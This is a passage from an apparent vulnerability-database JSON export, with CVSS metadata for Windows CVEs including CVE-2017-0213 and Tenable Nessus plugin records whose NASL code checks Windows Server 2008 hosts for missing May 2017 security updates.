($viewctl1*)\n}\n```\n\n#### Acknowledgements\n\nThe authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": 
"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-21T14:00:00", "type": "fireeye", "title": "OVERRULED: Containing a Potentially Destructive Adversary", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11774", "CVE-2017-0213"], "modified": "2018-12-21T14:00:00", "id": "FIREEYE:A6971C196BCA3B73B3F64A1FE0801A5B", "href": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "githubexploit": [{"lastseen": "2022-03-15T18:45:13", "description": "#### \u5f15\u7528 ####\n\n>\u8fd9\u4e2a\u6f0f\u6d1e\u5c5e\u4e8eWindows\u00a0CardSpace\u670d\u52a1\u672a\u6b63\u786e\u5904\u7406\u7b26\u53f7\u94fe\u63a5\u5bf9\u8c61\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u66ff\u6362\u7684\u672c\u5730\u6743...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-06-01T04:44:05", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0787", "CVE-2017-0213", "CVE-2020-1066"], "modified": "2022-03-15T16:18:20", "id": "FB99D0AC-3747-583A-AE7D-EE0F4E626D66", "href": "", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "nessus": [{"lastseen": "2022-06-16T16:22:24", "description": "The remote Windows host is missing multiple security updates released on 2017/05/09. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows improperly handles objects in memory.\n (CVE-2017-0077)\n\n - A denial of service vulnerability exists in Windows DNS Server if the server is configured to answer version queries. An attacker who successfully exploited this vulnerability could cause the DNS Server service to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the way that the Windows Graphics Device Interface+ (GDI+) handles objects in memory, allowing an attacker to retrieve information from a targeted system.\n (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. 
A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0175, CVE-2017-0220)\n\n - An information disclosure vulnerability exists in the way some ActiveX objects are instantiated. An attacker who successfully exploited this vulnerability could gain access to protected memory contents. (CVE-2017-0242)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions. On systems with Windows 7 for x64-based Systems or later installed, this vulnerability can lead to denial of service.\n (CVE-2017-0244)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-0245)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. 
On computers with Windows 7 for x64-based systems or later installed, this vulnerability can lead to denial of service.\n (CVE-2017-0246)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly initializes objects in memory.\n (CVE-2017-0258)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory.\n (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. 
An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the GDI component due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to open a specially crafted document or visit a specially crafted website, to disclose the contents of memory. (CVE-2017-8552)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "Windows 2008 May 2017 Multiple Security Updates", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0175", "CVE-2017-0190", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0220", "CVE-2017-0242", "CVE-2017-0244", "CVE-2017-0245", "CVE-2017-0246", "CVE-2017-0258", "CVE-2017-0263", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280", "CVE-2017-8552"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/100063", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100063);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0077\",\n 
\"CVE-2017-0171\",\n \"CVE-2017-0175\",\n \"CVE-2017-0190\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0220\",\n \"CVE-2017-0242\",\n \"CVE-2017-0244\",\n \"CVE-2017-0245\",\n \"CVE-2017-0246\",\n \"CVE-2017-0258\",\n \"CVE-2017-0263\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\",\n \"CVE-2017-8552\"\n );\n script_bugtraq_id(\n 98097,\n 98102,\n 98103,\n 98108,\n 98109,\n 98110,\n 98111,\n 98112,\n 98114,\n 98115,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98275,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4018196\");\n script_xref(name:\"MSKB\", value:\"4018466\");\n script_xref(name:\"MSKB\", value:\"4018556\");\n script_xref(name:\"MSKB\", value:\"4018821\");\n script_xref(name:\"MSKB\", value:\"4018885\");\n script_xref(name:\"MSKB\", value:\"4018927\");\n script_xref(name:\"MSKB\", value:\"4019149\");\n script_xref(name:\"MSKB\", value:\"4019204\");\n script_xref(name:\"MSKB\", value:\"4019206\");\n script_xref(name:\"MSFT\", value:\"MS17-4018196\");\n script_xref(name:\"MSFT\", value:\"MS17-4018466\");\n script_xref(name:\"MSFT\", value:\"MS17-4018556\");\n script_xref(name:\"MSFT\", value:\"MS17-4018821\");\n script_xref(name:\"MSFT\", value:\"MS17-4018885\");\n script_xref(name:\"MSFT\", value:\"MS17-4018927\");\n script_xref(name:\"MSFT\", value:\"MS17-4019149\");\n script_xref(name:\"MSFT\", value:\"MS17-4019204\");\n script_xref(name:\"MSFT\", value:\"MS17-4019206\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Windows 2008 May 
2017 Multiple Security Updates\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/05/09. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows improperly handles objects in memory.\n (CVE-2017-0077)\n\n - A denial of service vulnerability exists in Windows DNS\n Server if the server is configured to answer version\n queries. An attacker who successfully exploited this\n vulnerability could cause the DNS Server service to\n become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface+ (GDI+)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system.\n (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0175, CVE-2017-0220)\n\n - An information disclosure vulnerability exists in the\n way some ActiveX objects are instantiated. 
An attacker\n who successfully exploited this vulnerability could gain\n access to protected memory contents. (CVE-2017-0242)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions. On systems\n with Windows 7 for x64-based Systems or later installed,\n this vulnerability can lead to denial of service.\n (CVE-2017-0244)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-0245)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. On computers\n with Windows 7 for x64-based systems or later installed,\n this vulnerability can lead to denial of service.\n (CVE-2017-0246)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-0258)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory.\n (CVE-2017-0263)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. 
An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. 
An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018196/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018466/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018556/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018821/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018885/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4018927/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019149/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019204/title\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4019206/title\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - KB4018196\n - KB4018466\n - KB4018556\n - KB4018821\n - KB4018885\n - KB4018927\n - KB4019149\n - KB4019204\n - KB4019206\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-05';\n\nkbs = make_list(\n \"4018196\", \n \"4018466\",\n \"4018556\",\n \"4018821\",\n \"4018885\",\n \"4018927\",\n \"4019149\",\n \"4019204\",\n \"4019206\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB4018196 Applies only to hosts having 'DNS Server' role installed\nregistry_init();\nhklm = registry_hive_connect(hive:HKEY_LOCAL_MACHINE, exit_on_fail:TRUE);\ndns_role_installed = get_registry_value(\n handle:hklm,\n item:\"SYSTEM\\CurrentControlSet\\Services\\DNS\\DisplayName\"\n);\nRegCloseKey(handle:hklm);\nclose_registry(close:TRUE);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\nif(! 
smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\n\nwinsxs = ereg_replace(pattern:'^[A-Za-z]:(.*)', replace:\"\\1\\WinSxS\", string:systemroot);\nwinsxs_share = hotfix_path2share(path:systemroot);\n\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:winsxs_share);\nif (rc != 1)\n{\n NetUseDel();\n audit(AUDIT_SHARE_FAIL, winsxs_share);\n}\n\nthe_session = make_array(\n 'login', login,\n 'password', pass,\n 'domain', domain,\n 'share', winsxs_share\n);\n\nvuln = 0;\n\n# 4018196\nif (!isnull(dns_role_installed))\n{\n files = list_dir(basedir:winsxs, level:0, dir_pat:\"dns-server-service_31bf3856ad364e35_\", file_pat:\"^dns\\.exe$\", max_recurse:1);\n vuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018196\", session:the_session);\n}\n\n# 4018466\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"smbserver-common_31bf3856ad364e35_\", file_pat:\"^srvnet\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19673','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018466\", session:the_session);\n\n# 4018556\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"com-base-qfe-ole32_31bf3856ad364e35_\", file_pat:\"^ole32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19773','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018556\", session:the_session);\n\n# 4018821\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tdi-over-tcpip_31bf3856ad364e35_\", file_pat:\"^tdx\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19762','6.0.6002.24087'),\n 
max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018821\", session:the_session);\n\n# 4018885\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"tcpip-binaries_31bf3856ad364e35_\", file_pat:\"^tcpip\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19763','6.0.6002.24087'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018885\", session:the_session);\n\n# 4018927\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"rds-datafactory-dll_31bf3856ad364e35_\", file_pat:\"^msadcf\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19770','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4018927\", session:the_session);\n\n# 4019149\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"lddmcore_31bf3856ad364e35_\", file_pat:\"^dxgkrnl\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('7.0.6002.19765','7.0.6002.24089'),\n max_versions:make_list('7.0.6002.20000','7.0.6002.99999'),\n bulletin:bulletin,\n kb:\"4019149\", session:the_session);\n\n# 4019204\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"win32k_31bf3856ad364e35_\", file_pat:\"^win32k\\.sys$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19778','6.0.6002.24095'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n bulletin:bulletin,\n kb:\"4019204\", session:the_session);\n\n# 4019206\nfiles = list_dir(basedir:winsxs, level:0, dir_pat:\"gdi32_31bf3856ad364e35_\", file_pat:\"^gdi32\\.dll$\", max_recurse:1);\nvuln += hotfix_check_winsxs(os:'6.0',\n sp:2,\n files:files,\n versions:make_list('6.0.6002.19765','6.0.6002.24089'),\n max_versions:make_list('6.0.6002.20000','6.0.6003.99999'),\n 
bulletin:bulletin,\n kb:\"4019206\", session:the_session);\n\nif (vuln > 0)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:28", "description": "The remote Windows host is missing security update 4019213 or cumulative update 4019215. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. 
